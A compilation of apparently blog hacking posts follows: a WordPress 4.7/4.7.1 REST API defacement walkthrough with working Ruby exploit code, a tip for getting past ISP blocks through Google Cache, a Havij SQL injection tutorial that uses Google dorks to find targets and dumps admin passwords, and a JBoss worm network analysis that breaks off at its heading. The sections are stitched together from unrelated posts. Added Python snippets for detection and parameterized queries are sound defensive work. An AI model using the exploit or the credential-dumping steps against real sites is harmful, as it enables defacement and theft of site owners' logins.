WordPress REST API Exploit Step by Step

Vulnerability            : Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions   : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability allows an unauthenticated attacker to modify the content of posts or pages on the WP site.
Patched Version          : 4.7.2

Additional Info          : The REST API was added in WP 4.4, released in December 2015, but at that time a plugin was needed to activate it. From WP 4.7 no plugin is needed; the API comes enabled by default. This vulnerability is specific to the REST API, so 4.7.0 and 4.7.1 are directly affected because the API is enabled by default there.

In this demonstration, we show the exact steps used to exploit WordPress websites running the vulnerable versions 4.7 and 4.7.1. The tool used here is the Advanced REST Client Chrome add-on.

STEP 1: Find a Website Running WordPress

Google is your door: searching for something similar to this gave me plenty of WP websites.

However, we are not going to try this on any of those websites; I do not want to trouble anyone or get into trouble myself. I am going to demonstrate on my local WordPress installation instead, and this is the page whose content we are going to change without any authorization.

STEP 2: Find a Vulnerable WordPress

View the page source of the website to identify the running WP version. If the version is either 4.7 or 4.7.1, the website is vulnerable and you can proceed further.

STEP 3: Identify the WP Post ID

Each post in WP has a unique post ID, which is how the API references it. You need to find it using the REST API client. Here 3 is the post ID of the page shown in STEP 1.

STEP 4: Execute

Put your post ID in the API link; here I entered my post ID 3 as ?id=3ABC.

And we got the website hacked!

Alternatively, you can use the following exploit code:

require 'rest-client'
require 'json'

puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i

# The block form of RestClient.post returns the response object instead of
# raising on non-2xx status codes, so the check below sees every outcome.
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id"      => "#{postid}justrawdata",
    "title"   => "You have been hacked",
    "content" => "Hacked please update your wordpress version"
  }.to_json,
  :content_type => :json,
  :accept       => :json
) { |response, request, result| response }

if response.code == 200
  puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
  puts "This site is not Vulnerable"
end

source: exploit-db
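The two checks the walkthrough relies on, rewritten from the defender's side as an added example (not code from this post or from exploit-db): read the WordPress version out of the generator meta tag that STEP 2 inspects, and scan web server access logs for write requests to the posts endpoint whose id query parameter is not a plain number or does not match the post number in the path, which is the trace the ?id=3ABC step leaves behind. The HTML snippet and log lines are constructed samples in the standard combined log format; the IP addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Versions the post names as affected by the REST API content-modification bug.
VULNERABLE_VERSIONS = {"4.7", "4.7.1"}

GENERATOR_RE = re.compile(
    r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.IGNORECASE)

# Combined log format (Apache/nginx default); only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# The posts endpoint with its numeric id at the end of the path.
POSTS_RE = re.compile(r'/wp-json/wp/v2/posts/(?P<pathid>\d+)/?$')

# Constructed sample page source, as STEP 2 would see it.
SAMPLE_HTML = ('<html><head><meta name="generator" content="WordPress 4.7.1" />'
               '</head><body></body></html>')

# Constructed sample access log: a read, a write with a tampered id, a normal write.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2017:10:01:02 +0000] "GET /index.php/wp-json/wp/v2/posts/3 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [06/Feb/2017:10:01:09 +0000] "POST /index.php/wp-json/wp/v2/posts/3?id=3ABC HTTP/1.1" 200 2210',
    '198.51.100.7 - - [06/Feb/2017:10:02:11 +0000] "PUT /index.php/wp-json/wp/v2/posts/7?id=7 HTTP/1.1" 401 87',
]


def wordpress_version(html):
    """Return the version string from the generator meta tag, or None if absent.
    Many sites strip this tag, so a missing tag does not mean a patched site."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def is_vulnerable_version(html):
    version = wordpress_version(html)
    return version is not None and version in VULNERABLE_VERSIONS


def flag_rest_post_edits(log_lines):
    """Return one record per suspicious write to the posts endpoint.

    A write is suspicious when its id query parameter is not purely numeric,
    or when it disagrees with the numeric id in the path. An id sent only in
    the JSON body (as the Ruby exploit does) is not visible in an access log;
    that case needs the application log or a WAF in front of the site."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") not in ("POST", "PUT", "PATCH"):
            continue
        parts = urlsplit(m.group("path"))
        pm = POSTS_RE.search(parts.path)
        if not pm:
            continue
        qid = parse_qs(parts.query).get("id", [None])[0]
        if qid is None:
            continue
        if not qid.isdigit() or qid != pm.group("pathid"):
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "status": int(m.group("status")), "query_id": qid})
    return hits


if __name__ == "__main__":
    print("version:", wordpress_version(SAMPLE_HTML),
          "vulnerable:", is_vulnerable_version(SAMPLE_HTML))
    for hit in flag_rest_post_edits(SAMPLE_LOG):
        print("suspicious write:", hit)
```

A status of 200 on a flagged write is the signal worth paging on; a 401 means the site rejected the request, which is what a patched 4.7.2 install returns for an unauthenticated caller.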

Easy way to access blocked websites

You must be familiar with Google Cache. If not, a two-line description explains it well.

Google takes a snapshot of each page it crawls and caches that version on its servers. This cached copy (Google Cache) is used by Google to decide whether the website is relevant to your search query.

So if a website is blocked by your ISP due to local law enforcement, you can still access it using the Google Cache option. Let's look at it.

In the country where I am currently living, Pirate Bay torrents are blocked.

website blocked

In order to access such a blocked website, instead of browsing directly to thepiratebay.sx, choose the 'Cached' option in the drop-down menu in the Google search results.

Google Cache

So with the help of Google Cache, I am now able to view the contents of The Pirate Bay, even though it is blocked by the ISP.

Google Cache Website

An alternative method is to use a Google Cache tool. One of the easiest is cache.nevkontakte.com; it actually serves you results from Google Cache only.

Enjoy accessing blocked websites!

How to hack using Havij

Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. But it is now most commonly used by the hacker community, as noted in an interesting Dark Reading article, Cybercrime's Love Affair With Havij Spells SQL Injection Trouble, by Ericka
“So when I sat and read chat logs from Anonymous IRC rooms where they do hacker training, the only thing I ever see mentioned is Havij,” Shaul says. “The reason for that is Havij is awesome. And it’s as powerful and easy to use as could be.”
The amazing thing about this tool is that you just need to click buttons to let it work for you; no programming is required. Cool one…right!
Note: I have executed Havij in my own lab against a vulnerable website. I take no responsibility for whatever you do using this tutorial.
Preparation:
  • Download the free edition of Havij (on the same page you can see the difference between the free and professional editions). Which one you need is a matter of what your target is.
  • Now google with the options below to find websites vulnerable to SQL injection to target with Havij.

inurl:index.php?id=
inurl:article.php?id=

Once you choose a website, type ' at the end of the URL as shown below and press Enter. If you get an error, the website is vulnerable to SQL injection.

http://www.hackandsecure/site/content.php?vn=3&id=77'

1. Retrieve DB Information:
Copy and paste the target URL into the 'Target' field and click 'Analyze'.
Once Havij has retrieved the DB name, it stops and you can see the database details either in the log window or under the 'Info' option. Havij retrieves the web server type (Apache, IIS or other), DB type (MySQL, MS SQL or other) and DB name.
Once this succeeds, you can be sure you are on the right path, i.e. your target is vulnerable to SQL injection.
2. Retrieve Tables:
Now you need to retrieve the table that contains the user names and passwords used to log in to the website. Choose the DB and click the 'Get Tables' option.
Now all the tables are retrieved from the DB. You can either wait until it retrieves all the tables or stop the process when you see a suspect table like the one below. I stopped the process when Havij found a table that I suspected contained user names and passwords for the website.
3. Retrieve Table Columns:
Before you start retrieving data from a specific table, you need its columns. So mark the suspected password table and click 'Get Columns'.
I am really sorry for masking all website-specific details in red; I must do that to safeguard the site.
4. Retrieve User Name and Password:
You are at the final stage. Mark the database, table and columns to be retrieved (you have the option of retrieving only one row) and choose 'Get Data' to let Havij give you member access to the site.
I am done now; luckily my target website didn't store passwords encrypted, and I have their website's admin password. That's it!
If the password is hashed rather than stored in clear text, Havij has an inbuilt MD5 option where you can specify the MD5 hash to be cracked. Havij looks up the hash on several sites in multi-threaded mode and displays the result.
If you need additional information, download the PDF manual from ITSecTeam.
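Why the stray quote appended to the URL above produces an error, and why the same input is inert against a correctly written query, as an added example that is not part of this tutorial and has nothing to do with Havij itself: an in-memory SQLite table (constructed) stands in for the site's content table, one lookup builds its SQL by string concatenation the way the tutorial's target evidently does, the other binds the value as a parameter, and a small probe helper reports either the rows or the error text, which is what the "type ' and look for an error" test is really measuring.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the site's content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)",
                     [(77, "Article 77"), (78, "Article 78")])
    return conn


def fetch_vulnerable(conn, id_param):
    """Query built by string concatenation: the id value is spliced into the SQL
    text, so a quote in the input changes the statement itself and the database
    raises a syntax error. That error is the signal the tutorial looks for."""
    sql = "SELECT id, title FROM content WHERE id = '" + id_param + "'"
    return conn.execute(sql).fetchall()


def fetch_parameterized(conn, id_param):
    """Query with a bound parameter: the driver sends the value separately from
    the SQL text, so the input is only ever data and a quote is just a quote."""
    return conn.execute("SELECT id, title FROM content WHERE id = ?",
                        (id_param,)).fetchall()


def fetch_validated(conn, id_param):
    """Defense in depth: an id must be a plain integer, so reject anything else
    before it reaches the database at all."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return fetch_parameterized(conn, id_param)


def probe(fetch, id_param):
    """Run one lookup and report ('ok', rows) or ('error', message), mirroring
    what a tester sees in the page response."""
    conn = make_db()
    try:
        return ("ok", fetch(conn, id_param))
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for name, fetch in (("concatenated", fetch_vulnerable),
                        ("parameterized", fetch_parameterized),
                        ("validated", fetch_validated)):
        for value in ("77", "77'"):
            print(f"{name:14} id={value!r:6} -> {probe(fetch, value)}")
```

The concatenated version answers the probe with a syntax error, the parameterized version answers it with an empty result set, and the validated version rejects it before any SQL runs; only the first behaviour tells an automated tool that the parameter is worth attacking. SQLite applies numeric affinity when comparing the INTEGER column with the text value, which is why the plain "77" still matches in every variant.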

JBoss Worm Perl.Bossworm Infection

Let me share some of my network analysis and IPS reports from soon after I found that my test JBoss server had been infected by Perl.Bossworm.

Perl.Bossworm is a worm that exploits the JBoss Enterprise Application Platform multiple vulnerabilities (BID 39710) to copy itself to unpatched JBoss servers. Once Perl.Bossworm is installed on a vulnerable server, it finds and infects more vulnerable servers. It connects to predetermined domains to download and install other malware. Remove Perl.Bossworm before it harms your system.

How to find a JBoss worm infection on your network:

Perl.Bossworm symptoms on the JBoss server itself are discussed and very well explained in the JBoss Community. Below are the symptoms on the network side from my lab:

Symptom 1:

  • The connectivity between the network switch and the firewall becomes very unstable. I had frequent disconnections (request timeout) even when pinging the inside interface of the firewall from the switch's Telnet console. So obviously you will have either a slow Internet connection or no connectivity at all.
Telnet to your network switch and ping the inside LAN interface of the firewall to check the ping response status.
Symptom 2:
  • Network switch utilization has gone up and reached 99% 🙁
Commands to execute and verify on the network switch:
1. sh proc cpu sorted (Cisco switch command)
You can see that my switch utilization went very high in the 5-second statistics.
2. show platform cpu packet statistics (Cisco switch command)
Port GI 7/9 on the network switch, where the JBoss server was connected, was finally found to be transmitting a huge number of packets within a few seconds.

Firewall and IPS (Intrusion Prevention System) Worm Infection Report:

The IPS reports shown below clarify what really caused the high CPU utilization on the network switch and the firewall disconnections.

  • The day after the worm infection, it had established nearly 17000 IRC-based sessions to the outside Internet.

  • 342 GB of bandwidth was used on day 2 of the infection.
  • Finally, we have the IRC IPs with which the infected JBoss server was communicating.
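The three IPS observations above (IRC sessions from one host, bytes sent by that host, and the list of IRC peers it talked to) reduce to a per-host aggregation over the firewall's connection log. Here is that logic as an added example, not from the post or from any IPS product, over constructed connection-log lines in a made-up comma-separated format (timestamp, source IP, destination IP, destination port, protocol, bytes). The address 10.0.0.25 stands for the infected JBoss server, 10.0.0.40 for a healthy host, the external addresses are documentation ranges, and the port set is the conventional IRC range; an application server has no business opening any of them, so the alert threshold is deliberately low.

```python
from collections import Counter, defaultdict

# Constructed connection log, one flow per line:
# timestamp,src_ip,dst_ip,dst_port,proto,bytes
SAMPLE_FLOWS = """\
2013-10-14T09:00:01,10.0.0.25,198.51.100.23,6667,tcp,4120
2013-10-14T09:00:02,10.0.0.25,198.51.100.23,6667,tcp,3980
2013-10-14T09:00:03,10.0.0.25,203.0.113.77,6667,tcp,4411
2013-10-14T09:00:04,10.0.0.25,203.0.113.77,6697,tcp,5120
2013-10-14T09:00:05,10.0.0.25,192.0.2.9,80,tcp,913
2013-10-14T09:00:06,10.0.0.40,192.0.2.9,443,tcp,20311
2013-10-14T09:00:07,10.0.0.40,192.0.2.10,443,tcp,18877
"""

# Conventional IRC ports (plain and TLS); assumed here, adjust to local policy.
IRC_PORTS = {6665, 6666, 6667, 6668, 6669, 6697, 7000}


def parse_flows(text):
    """Parse the constructed CSV-style log into a list of flow dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto, nbytes = line.split(",")
        flows.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport),
                      "proto": proto, "bytes": int(nbytes)})
    return flows


def irc_sessions_by_host(flows):
    """Count flows to IRC ports per internal source host (the 17000-session signal)."""
    return Counter(f["src"] for f in flows if f["dport"] in IRC_PORTS)


def bytes_by_host(flows):
    """Total bytes sent per source host (the 342 GB signal, at toy scale)."""
    totals = defaultdict(int)
    for f in flows:
        totals[f["src"]] += f["bytes"]
    return dict(totals)


def irc_peers(flows, host):
    """Sorted list of IRC destinations a host spoke to (the list of IRC IPs)."""
    return sorted({f["dst"] for f in flows
                   if f["src"] == host and f["dport"] in IRC_PORTS})


def flag_irc_beacons(flows, min_sessions=3):
    """Hosts with at least min_sessions IRC-port flows, mapped to their count."""
    return {host: n for host, n in irc_sessions_by_host(flows).items()
            if n >= min_sessions}


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for host, count in flag_irc_beacons(flows).items():
        print(f"{host}: {count} IRC sessions, {bytes_by_host(flows)[host]} bytes, "
              f"peers {irc_peers(flows, host)}")
```

Fed with the real firewall export, the same three aggregations give the host to isolate, the volume to expect in the bandwidth report, and the destination addresses to block at the perimeter while the server is rebuilt.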
Solution to remove JBoss Worm: